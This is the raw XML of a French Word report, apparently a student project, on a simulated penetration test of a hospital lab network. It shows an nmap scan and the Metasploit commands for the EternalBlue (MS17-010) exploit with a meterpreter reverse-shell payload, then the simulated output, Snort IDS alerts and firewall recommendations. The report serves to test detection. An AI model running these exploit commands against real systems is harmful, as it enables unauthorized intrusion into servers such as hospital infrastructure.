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D5431" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Simulation de Test d'Intrusion – Projet CHU Ynov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A416F8C" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="2043D9E8" w14:textId="28F2B533" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Contexte de l’audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B67BB" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="6E21F3D5" w14:textId="2B0506D8" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Dans le cadre du projet de sécurisation du CHU de Ynov, un test d'intrusion interne a été simulé pour vérifier la robustesse de l’architecture réseau et la capacité du système IDS/IPS à détecter les activités malveillantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DEE3EB" w14:textId="1B4C289F" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zone de lancement : VLAN 99 (Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F435EF2" w14:textId="200491A5" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Machine utilisée : PC “Pentester” – IP : 192.168.99.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429B535" w14:textId="0A1A50E2" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cible : Serveur Web médical – IP : 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC2AF5" w14:textId="05A2086B" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Objectif : scanner les ports ouverts, détecter d’éventuelles failles, tester la réaction de l’IDS Snort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8C55B" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="3448116C" w14:textId="48CDD38B" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase de reconnaissance – Scan Nmap simulé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BAEBB" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="1A78C0C0" w14:textId="4EA9270B" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r w:rsidRPr="008D7CB1">
        <w:rPr>
          <w:rStyle w:val="Titre3Car"/>
        </w:rPr>
        <w:t>Commande utilisée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930CAA2" w14:textId="547B1EB0" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nmap -sS -p 21,22,23,80,443 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69010C52" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="6B7A4AB4" w14:textId="51C838F0" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Résultat simulé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D90DE71" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>PORT     STATE    SERVICE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</w:tblGrid>
      <w:tr w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w14:paraId="545E5760" w14:textId="77777777" w:rsidTr="008D7CB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="623CDFB0" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="001A50BE">
            <w:r w:rsidRPr="008D7CB1">
              <w:t>21/tcp   open     ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w14:paraId="4DCF074E" w14:textId="77777777" w:rsidTr="008D7CB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424AE20E" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="001A50BE">
            <w:r w:rsidRPr="008D7CB1">
              <w:t>22/tcp   open     ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w14:paraId="4122A628" w14:textId="77777777" w:rsidTr="008D7CB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A581B79" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="001A50BE">
            <w:r w:rsidRPr="008D7CB1">
              <w:t>23/tcp   closed   telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w14:paraId="4F921E83" w14:textId="77777777" w:rsidTr="008D7CB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694D2505" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="001A50BE">
            <w:r w:rsidRPr="008D7CB1">
              <w:t>80/tcp   open     http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w14:paraId="03988FCF" w14:textId="77777777" w:rsidTr="008D7CB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A95E6F" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="001A50BE">
            <w:r w:rsidRPr="008D7CB1">
              <w:t>443/tcp  closed   https</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34D6C2DE" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="2DFE841C" w14:textId="41554B36" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Le scan a révélé la présence de services FTP, SSH et HTTP actifs sur le serveur médical. Cela pourrait indiquer des services mal configurés ou non nécessaires dans un environnement médical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181EE843" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="74C10DC1" w14:textId="00333D93" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase d’exploitation – Simulation Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F3C110" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRPr="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="5F59D62C" w14:textId="515B0BF9" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Objectif :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tester la vulnérabilité MS17-010 (EternalBlue) sur la cible 192.168.10.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AD0E7" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="33B98794" w14:textId="49E52F39" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Commandes simulées :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92FA07" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748EC065" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377EB96" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set RHOST 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95ADF0" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E9EDC" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST 192.168.99.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61537C" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC95BD" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="63EEFF52" w14:textId="12759B7A" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Résultat simulé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5E0B4" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>[*] Started reverse TCP handler on 192.168.99.110:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A3327" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>[*] Sending crafted SMB packet...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7EB50" w14:textId="7E658A98" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>[*] Exploit successful, meterpreter session opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB038D" w14:textId="5C7B6736" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cela simule une compromission complète du serveur Web via une faille SMB connue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C4077F" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="506073B8" w14:textId="09D50364" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Réaction de l'IDS (Snort) – VLAN 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DE1E4C" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1745E953" w14:textId="1882EB86" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Logs générés (snort_logs.txt) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014DEBB" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>[**] [1:1000002:0] Port Scan Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687F61B" w14:textId="7192225B" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>03/05-10:44:19.320984 &gt; TCP Port Scan 192.168.99.110 -&gt; 192.168.10.2: 21,22,23,80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F93A81" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>[**] [1:1000003:0] SMB Exploit Attempt Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1E19A" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/05-10:45:02.003421 &gt; SMB MS17-010 RCE Exploit Attempt from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7C18E" w14:textId="25638494" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
      <w:r>
        <w:t>192.168.99.110 to 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01380098" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6759051A" w14:textId="366C938E" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t xml:space="preserve"> L’IDS Snort a correctement identifié les tentatives de scan et l’exploitation, avec classification critique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25B034" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="09E5B21B" w14:textId="55BB5A6D" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion &amp; recommandations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEE68E9" w14:textId="77777777" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1"/>
    <w:p w14:paraId="4AD70ABD" w14:textId="50B07AA9" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>La simulation a d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>montr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la capacit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> du syst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">me IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>tecter des menaces type pentest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3C103" w14:textId="77172AC0" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Toutefois, la pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>sence de ports ouverts (FTP, SSH) est un risque :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03BB0D" w14:textId="1D5E95F0" w:rsidR="008D7CB1" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Recommandation : filtrer via des ACLs ou un pare-feu applicatif (pfSense réel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708386B6" w14:textId="1E9CE414" w:rsidR="007B24C2" w:rsidRPr="00E26BD8" w:rsidRDefault="008D7CB1" w:rsidP="008D7CB1">
      <w:r>
        <w:t>Ce test valide l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r>
        <w:t>t de placer un IDS dans une zone management isol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>e (VLAN 99) avec visibilit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur les flux inter-VLAN</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007B24C2" w:rsidRPr="00E26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6356"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DA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263F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C94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C5375"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51FCA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30CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CE4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42B24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7848C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33924"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D844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B26EFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="377625B0"/>
    <w:lvl w:ilvl="0" w:tplc="AE8470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715C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D630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97B2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="148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D795C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3228A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D0D12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54C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C70C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA4C1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177C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DD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42B8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B62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886186">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1059088963">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1263033053">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="96365108">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1560283572">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2140417114">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1800956808">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1606380933">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="646784460">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="423840978">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1238662544">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1542551637">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1103187575">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="365764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C2"/>
    <w:rsid w:val="003E362C"/>
    <w:rsid w:val="00702DDE"/>
    <w:rsid w:val="007B24C2"/>
    <w:rsid w:val="007E4AC5"/>
    <w:rsid w:val="008D7CB1"/>
    <w:rsid w:val="00990DD8"/>
    <w:rsid w:val="00CD7436"/>
    <w:rsid w:val="00E26BD8"/>
    <w:rsid w:val="00F2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E83E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E64113BF-8549-4F6F-9F7C-9AA3EA17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7CB1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40"/>
      <w:szCs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7CB1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7CB1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1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2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2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2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2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2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2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7CB1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40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D7CB1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"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D7CB1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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7B24C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24C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24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24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24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24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2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2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2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2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2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24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24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24C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2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24C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24C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D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etesse</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>tristan etesse</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-28T17:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-28T17:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>